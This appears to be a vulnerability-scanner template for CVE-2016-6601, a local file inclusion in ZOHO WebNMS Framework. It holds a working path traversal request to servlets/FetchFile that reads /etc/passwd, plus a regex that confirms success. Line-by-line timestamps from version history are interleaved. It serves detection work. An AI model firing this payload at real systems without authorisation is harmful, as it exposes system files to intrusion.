2022-08-21 00:25:37 +00:00
id : CVE-2016-6601
info :
2023-01-16 17:41:15 +00:00
name : ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion
2022-08-21 00:25:37 +00:00
author : 0x_Akoko
severity : high
2023-01-16 17:41:15 +00:00
description : ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
2022-08-21 00:25:37 +00:00
reference :
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
2022-09-02 05:59:48 +00:00
- https://www.exploit-db.com/exploits/40229/
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2016-6601
2022-08-21 00:25:37 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2016-6601
cwe-id : CWE-22
2022-09-04 15:21:50 +00:00
tags : edb,cve,cve2016,zoho,lfi,webnms
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-08-21 00:29:52 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-21 00:25:37 +00:00
- method : GET
path :
2022-09-02 05:10:10 +00:00
- "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
2022-08-21 00:25:37 +00:00
2022-09-02 05:10:10 +00:00
matchers-condition : and
2022-08-21 00:25:37 +00:00
matchers :
2022-09-02 05:10:10 +00:00
- type : regex
regex :
- "root:.*:0:0"
2022-08-21 00:25:37 +00:00
- type : status
status :
- 200